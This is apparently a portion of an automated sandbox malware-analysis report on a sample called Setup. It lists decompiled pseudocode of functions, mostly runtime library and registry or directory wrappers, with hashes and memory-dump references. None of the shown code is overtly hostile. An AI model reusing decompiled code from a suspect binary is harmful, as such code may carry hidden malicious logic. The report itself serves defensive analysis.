                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandleInternet
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1081599783-0
                                                                                                                                                              • Opcode ID: 5d7717c1b9295ea8faa2cc6d646949c8e008cc71e97655b22e0b5ad4ad0d7d83
                                                                                                                                                              • Instruction ID: 954ac52303eef577f79202d418b083c80d2e3be7494a3a46e7203f2e1600ef05
                                                                                                                                                              • Opcode Fuzzy Hash: 5d7717c1b9295ea8faa2cc6d646949c8e008cc71e97655b22e0b5ad4ad0d7d83
                                                                                                                                                              • Instruction Fuzzy Hash: 9CF0AC74901208EFDB04CF94DA94F9EB7F5EB49305F2481D9E8055B3A0C776AE41EB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0049E610 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E0049E610(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				int _v8;
				int _t10;

				_push(__ecx);
				_t10 = CreateDirectoryW(E00416A30(_a4 + 4), 0); // executed
				_v8 = _t10;
				if(_v8 == 0 && _a8 != 0) {
					 *_a8 = GetLastError();
				}
				return 0 | _v8 != 0x00000000;
			}





                                                                                                                                                              0x0049e613
                                                                                                                                                              0x0049e622
                                                                                                                                                              0x0049e628
                                                                                                                                                              0x0049e62f
                                                                                                                                                              0x0049e640
                                                                                                                                                              0x0049e640
                                                                                                                                                              0x0049e64e

                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,004D6543,?,00000000,00000000,00000000,DDD124F9), ref: 0049E622
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0049E637
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                              • Opcode ID: 3b25b2bf652a9b564b26553f7980285f893cc1f46bad78e318f9c7318d09db0f
                                                                                                                                                              • Instruction ID: 6ed70589b5ef52341549c58a9c58e01730df6f24d26f59066d9767976b0fcf79
                                                                                                                                                              • Opcode Fuzzy Hash: 3b25b2bf652a9b564b26553f7980285f893cc1f46bad78e318f9c7318d09db0f
                                                                                                                                                              • Instruction Fuzzy Hash: 38E01A3050120CEFEF04DFA1C81D7AD7BA9EB18319F14C5AAE80657280E7799F94DE55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00451F02 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00451F02(void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t12;
				void* _t20;
				void* _t21;

				_t21 = __eflags;
				E00456860(_t12, __edi, __esi);
				_t8 = E00457400(_t12, __edx, __edi, _t21);
				 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
				E00451EC5( *((intOrPtr*)(_t8 + 0x54))( *((intOrPtr*)(_t8 + 0x58)), 0x5441d8, 0xc)); // executed
				 *((intOrPtr*)(_t20 - 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t20 - 0x14))))));
				return E0045B73E(_t12,  *(_t20 - 4),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t20 - 0x14)))))),  *((intOrPtr*)(_t20 - 0x14)));
			}







                                                                                                                                                              0x00451f02
                                                                                                                                                              0x00451f09
                                                                                                                                                              0x00451f0e
                                                                                                                                                              0x00451f13
                                                                                                                                                              0x00451f1e
                                                                                                                                                              0x00451f2a
                                                                                                                                                              0x00451f36

                                                                                                                                                              APIs
                                                                                                                                                              • __getptd.LIBCMT ref: 00451F0E
                                                                                                                                                                • Part of subcall function 00457400: __getptd_noexit.LIBCMT ref: 00457403
                                                                                                                                                                • Part of subcall function 00457400: __amsg_exit.LIBCMT ref: 00457410
                                                                                                                                                                • Part of subcall function 00451EC5: __IsNonwritableInCurrentImage.LIBCMT ref: 00451ED8
                                                                                                                                                                • Part of subcall function 00451EC5: __getptd_noexit.LIBCMT ref: 00451EE8
                                                                                                                                                                • Part of subcall function 00451EC5: __freeptd.LIBCMT ref: 00451EF2
                                                                                                                                                                • Part of subcall function 00451EC5: ExitThread.KERNEL32 ref: 00451EFB
                                                                                                                                                              • __XcptFilter.LIBCMT ref: 00451F2F
                                                                                                                                                                • Part of subcall function 0045B73E: __getptd_noexit.LIBCMT ref: 0045B746
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 393088965-0
                                                                                                                                                              • Opcode ID: 15d05b8fc0f517c78afa5a291257b6dc5f963ba68e1fd513f6f8a81547b156e7
                                                                                                                                                              • Instruction ID: 2db33640291945a4916f261701f022404c50faab4637c64130de3f2df15c61e3
                                                                                                                                                              • Opcode Fuzzy Hash: 15d05b8fc0f517c78afa5a291257b6dc5f963ba68e1fd513f6f8a81547b156e7
                                                                                                                                                              • Instruction Fuzzy Hash: ABE08CB0900A009FD708BBA1C906F3D3B64EF4430AF21048EF8016B2B3CB38A844DE28
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0045799C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0045799C(int _a4) {

				E00457971(_a4);
				ExitProcess(_a4);
			}



                                                                                                                                                              0x004579a4
                                                                                                                                                              0x004579ad

                                                                                                                                                              APIs
                                                                                                                                                              • ___crtCorExitProcess.LIBCMT ref: 004579A4
                                                                                                                                                                • Part of subcall function 00457971: GetModuleHandleW.KERNEL32(mscoree.dll,?,004579A9,?,?,0044FC12,000000FF,0000001E,?,00457755,?,00000001,?,?,00457D86,00000018), ref: 0045797B
                                                                                                                                                                • Part of subcall function 00457971: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0045798B
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004579AD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2427264223-0
                                                                                                                                                              • Opcode ID: 1af2791227fca424a2fddb2dc790eec8f133d391b39f7d2c30ad27ed7b057826
                                                                                                                                                              • Instruction ID: 01e986f5e3393614e45b7cf44e6b393859f2d6e220982185113d1069ae569363
                                                                                                                                                              • Opcode Fuzzy Hash: 1af2791227fca424a2fddb2dc790eec8f133d391b39f7d2c30ad27ed7b057826
                                                                                                                                                              • Instruction Fuzzy Hash: B5B09B350141087BDB012F12DC0985D3F15DB813517104025F81509031DF719D96D595
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00417CF0 Relevance: 1.6, APIs: 1, Instructions: 99COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                              			E00417CF0(void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				void* __ecx;
				signed int _t49;
				intOrPtr _t59;
				void* _t63;
				char _t72;
				signed int _t106;
				void* _t107;

				_push(0xffffffff);
				_push(0x514280);
				_push( *[fs:0x0]);
				_push(_t72);
				_t49 =  *0x561244; // 0xddd124f9
				_push(_t49 ^ _t106);
				 *[fs:0x0] =  &_v16;
				_v20 = _t107 - 0xc;
				_v32 = _t72;
				_v28 = _a4 | 0x00000007;
				if(E00417AF0(_v32) >= _v28) {
					if(_v28 / 3 <  *(_v32 + 0x18) >> 1 &&  *(_v32 + 0x18) <= E00417AF0(_v32) - ( *(_v32 + 0x18) >> 1)) {
						_v28 = ( *(_v32 + 0x18) >> 1) +  *(_v32 + 0x18);
					}
				} else {
					_v28 = _a4;
				}
				_v24 = 0;
				_v8 = 0;
				_t59 = E00417CD0(_v32, _v28 + 1); // executed
				_v24 = _t59;
				_v8 = 0xffffffff;
				if(_a8 > 0) {
					E00418000(_v28 + 1, _v24, _v28 + 1, E00418030(_v32), _a8);
				}
				E00417E70(_v32, 1, 0);
				 *((intOrPtr*)(_v32 + 4)) = _v24;
				 *(_v32 + 0x18) = _v28;
				_t63 = E00418080(_v32, _a8);
				 *[fs:0x0] = _v16;
				return _t63;
			}
















                                                                                                                                                              0x00417cf3
                                                                                                                                                              0x00417cf5
                                                                                                                                                              0x00417d00
                                                                                                                                                              0x00417d01
                                                                                                                                                              0x00417d08
                                                                                                                                                              0x00417d0f
                                                                                                                                                              0x00417d13
                                                                                                                                                              0x00417d19
                                                                                                                                                              0x00417d1c
                                                                                                                                                              0x00417d25
                                                                                                                                                              0x00417d33
                                                                                                                                                              0x00417d53
                                                                                                                                                              0x00417d7d
                                                                                                                                                              0x00417d7d
                                                                                                                                                              0x00417d35
                                                                                                                                                              0x00417d38
                                                                                                                                                              0x00417d38
                                                                                                                                                              0x00417d80
                                                                                                                                                              0x00417d87
                                                                                                                                                              0x00417d98
                                                                                                                                                              0x00417d9d
                                                                                                                                                              0x00417df9
                                                                                                                                                              0x00417e04
                                                                                                                                                              0x00417e1e
                                                                                                                                                              0x00417e23
                                                                                                                                                              0x00417e2d
                                                                                                                                                              0x00417e38
                                                                                                                                                              0x00417e41
                                                                                                                                                              0x00417e4b
                                                                                                                                                              0x00417e53
                                                                                                                                                              0x00417e61

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00417AF0: allocator.LIBCPMTD ref: 00417AFC
                                                                                                                                                              • allocator.LIBCPMTD ref: 00417D98
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: 49a2f17e9de5e3deacfbff8912cce8294b908f3145b02ac1c15cb8764968bbeb
                                                                                                                                                              • Instruction ID: 9f44215ad7b48d03794646ec72d63729a886d3fb837e5d513c72074537cc9730
                                                                                                                                                              • Opcode Fuzzy Hash: 49a2f17e9de5e3deacfbff8912cce8294b908f3145b02ac1c15cb8764968bbeb
                                                                                                                                                              • Instruction Fuzzy Hash: DB41CAB4E0420A9FCB08DF99D991ABFBBB5FF58314F10811EE515A7381D638A981CBD4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041EDE0 Relevance: 1.6, APIs: 1, Instructions: 68registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E0041EDE0(void** __ecx, short* _a4, char* _a8, unsigned int* _a12) {
				int _v8;
				int _v12;
				long _v16;
				void** _v20;
				long _t35;

				_v20 = __ecx;
				do {
				} while (0 != 0 || 0 != 0);
				_v12 =  *_a12 << 1;
				 *_a12 = 0;
				_t35 = RegQueryValueExW( *_v20, _a4, 0,  &_v8, _a8,  &_v12); // executed
				_v16 = _t35;
				if(_v16 == 0) {
					if(_v8 == 1 || _v8 == 2) {
						if(_a8 == 0) {
							L15:
							 *_a12 = _v12 >> 1;
							return 0;
						}
						if(_v12 == 0) {
							 *_a8 = 0;
							goto L15;
						}
						if(_v12 % 2 != 0 || (_a8[(_v12 >> 1) * 2 - 2] & 0x0000ffff) != 0) {
							return 0xd;
						} else {
							goto L15;
						}
					} else {
						return 0xd;
					}
				}
				return _v16;
			}








                                                                                                                                                              0x0041ede6
                                                                                                                                                              0x0041ede9
                                                                                                                                                              0x0041ede9
                                                                                                                                                              0x0041edf8
                                                                                                                                                              0x0041edfe
                                                                                                                                                              0x0041ee1c
                                                                                                                                                              0x0041ee22
                                                                                                                                                              0x0041ee29
                                                                                                                                                              0x0041ee34
                                                                                                                                                              0x0041ee47
                                                                                                                                                              0x0041ee81
                                                                                                                                                              0x0041ee89
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041ee8b
                                                                                                                                                              0x0041ee4d
                                                                                                                                                              0x0041ee7e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041ee7e
                                                                                                                                                              0x0041ee5d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041ee77
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041ee77
                                                                                                                                                              0x0041ee3c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041ee3c
                                                                                                                                                              0x0041ee34
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000020,00000001,00000000,00000020,?,00000001,0047F702,svcVersion,00000001,00000020,Software\Microsoft\Internet Explorer\,00000001,DDD124F9), ref: 0041EE1C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3660427363-0
                                                                                                                                                              • Opcode ID: eab2924b431d68ee9115c4182a009e1237d85a4e1ed2f57fa7b1bca71f828541
                                                                                                                                                              • Instruction ID: be990d5a6d9182fce01ba0ffaa6c408bebd698dfed37db20f02eb68458331d30
                                                                                                                                                              • Opcode Fuzzy Hash: eab2924b431d68ee9115c4182a009e1237d85a4e1ed2f57fa7b1bca71f828541
                                                                                                                                                              • Instruction Fuzzy Hash: 2D214F78A00209EBDB18CF9AC444BEFB7B6EF98300F10855AEC1597390D7389A81CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00433AC0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                              			E00433AC0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed char _a20) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __ecx;
				signed int _t26;
				intOrPtr _t29;
				intOrPtr _t38;
				signed int _t52;
				void* _t53;

				_push(0xffffffff);
				_push(0x5160c1);
				_push( *[fs:0x0]);
				_push(_t38);
				_t26 =  *0x561244; // 0xddd124f9
				_push(_t26 ^ _t52);
				 *[fs:0x0] =  &_v16;
				_v20 = _t53 - 0x14;
				_v36 = _t38;
				_t29 = E00433BF0(_v36 + 1, 1); // executed
				_v24 = _t29;
				_v8 = 0;
				_v32 = E004144B0(0x34, _v24);
				_v8 = 1;
				if(_v32 == 0) {
					_v40 = 0;
				} else {
					_v40 = E00434540(_a4, _a8, _a12, _a16, _a20 & 0x000000ff);
				}
				_v28 = _v40;
				_v8 = 0;
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return _v24;
			}

















                                                                                                                                                              0x00433ac3
                                                                                                                                                              0x00433ac5
                                                                                                                                                              0x00433ad0
                                                                                                                                                              0x00433ad1
                                                                                                                                                              0x00433ad8
                                                                                                                                                              0x00433adf
                                                                                                                                                              0x00433ae3
                                                                                                                                                              0x00433ae9
                                                                                                                                                              0x00433aec
                                                                                                                                                              0x00433af7
                                                                                                                                                              0x00433afc
                                                                                                                                                              0x00433aff
                                                                                                                                                              0x00433b14
                                                                                                                                                              0x00433b17
                                                                                                                                                              0x00433b1f
                                                                                                                                                              0x00433b43
                                                                                                                                                              0x00433b21
                                                                                                                                                              0x00433b3e
                                                                                                                                                              0x00433b3e
                                                                                                                                                              0x00433b4d
                                                                                                                                                              0x00433b50
                                                                                                                                                              0x00433b7d
                                                                                                                                                              0x00433b8a
                                                                                                                                                              0x00433b98

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: 83640e26c94aebb76eba98aae00a5ad1b0284f78fbe020472ed44b087b7fb3e9
                                                                                                                                                              • Instruction ID: 4b0772133269115f449d225d50a6fdfeab6dc7638e8dbd230a6130781ab4af68
                                                                                                                                                              • Opcode Fuzzy Hash: 83640e26c94aebb76eba98aae00a5ad1b0284f78fbe020472ed44b087b7fb3e9
                                                                                                                                                              • Instruction Fuzzy Hash: 002138B1D04249EFDB04CF99D941BEEFBF8EB48714F20425AE915A7381D3796A00CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F8180 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                              			E004F8180(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v52;
				char _v53;
				intOrPtr _v60;
				signed int _t19;
				signed int _t20;
				void* _t27;
				signed int _t45;

				_t44 = __esi;
				_t43 = __edi;
				_t31 = __ebx;
				_push(0xffffffff);
				_push(0x50ddb4);
				_push( *[fs:0x0]);
				_t19 =  *0x561244; // 0xddd124f9
				_t20 = _t19 ^ _t45;
				_v20 = _t20;
				_push(_t20);
				 *[fs:0x0] =  &_v16;
				_v60 = __ecx;
				_t49 = _a4;
				if(_a4 != 0) {
					E004175C0(E00434050( &_v53));
					_v8 = 0;
					_t42 =  &_v52;
					_t27 = E004F80E0(__ebx, _v60, __edi, __esi, _t49,  &_v52, _a8, _a12); // executed
					E0045184A(_a4, _t27);
					_v8 = 0xffffffff;
					E004176E0();
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_a4, _t31, _v20 ^ _t45, _t42, _t43, _t44);
			}













                                                                                                                                                              0x004f8180
                                                                                                                                                              0x004f8180
                                                                                                                                                              0x004f8180
                                                                                                                                                              0x004f8183
                                                                                                                                                              0x004f8185
                                                                                                                                                              0x004f8190
                                                                                                                                                              0x004f8194
                                                                                                                                                              0x004f8199
                                                                                                                                                              0x004f819b
                                                                                                                                                              0x004f819e
                                                                                                                                                              0x004f81a2
                                                                                                                                                              0x004f81a8
                                                                                                                                                              0x004f81ab
                                                                                                                                                              0x004f81af
                                                                                                                                                              0x004f81bd
                                                                                                                                                              0x004f81c2
                                                                                                                                                              0x004f81d1
                                                                                                                                                              0x004f81d8
                                                                                                                                                              0x004f81e2
                                                                                                                                                              0x004f81ea
                                                                                                                                                              0x004f81f4
                                                                                                                                                              0x004f81f4
                                                                                                                                                              0x004f81ff
                                                                                                                                                              0x004f8214

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3048848545-0
                                                                                                                                                              • Opcode ID: 71ae127853fe379245b6bcb1b928257f265475b7083d30dc35f65075c8cfd88c
                                                                                                                                                              • Instruction ID: 9f85bb52fc9fbc8ed2681f036a1197e0334804cff0233300be372910fdc1c147
                                                                                                                                                              • Opcode Fuzzy Hash: 71ae127853fe379245b6bcb1b928257f265475b7083d30dc35f65075c8cfd88c
                                                                                                                                                              • Instruction Fuzzy Hash: B3112E71904108AFCB04DF95D841FEEB7B8FF08714F00462EF81597291EB346944CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00422580 Relevance: 1.5, APIs: 1, Instructions: 45registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00422580(intOrPtr* __ecx, void* _a4, short* _a8, short* _a12, int _a16, int _a20, struct _SECURITY_ATTRIBUTES* _a24, intOrPtr* _a28) {
				void* _v8;
				long _v12;
				int _v16;
				intOrPtr* _v20;
				long _t27;

				_v20 = __ecx;
				_v8 = 0;
				_t27 = RegCreateKeyExW(_a4, _a8, 0, _a12, _a16, _a20, _a24,  &_v8,  &_v16); // executed
				_v12 = _t27;
				if(_a28 != 0) {
					 *_a28 = _v16;
				}
				if(_v12 == 0) {
					_v12 = E0041EF10(_v20);
					 *_v20 = _v8;
					 *(_v20 + 4) = _a20 & 0x00000300;
				}
				return _v12;
			}








                                                                                                                                                              0x00422586
                                                                                                                                                              0x00422589
                                                                                                                                                              0x004225b2
                                                                                                                                                              0x004225b8
                                                                                                                                                              0x004225bf
                                                                                                                                                              0x004225c7
                                                                                                                                                              0x004225c7
                                                                                                                                                              0x004225cd
                                                                                                                                                              0x004225d7
                                                                                                                                                              0x004225e0
                                                                                                                                                              0x004225ed
                                                                                                                                                              0x004225ed
                                                                                                                                                              0x004225f6

                                                                                                                                                              APIs
                                                                                                                                                              • RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,?), ref: 004225B2
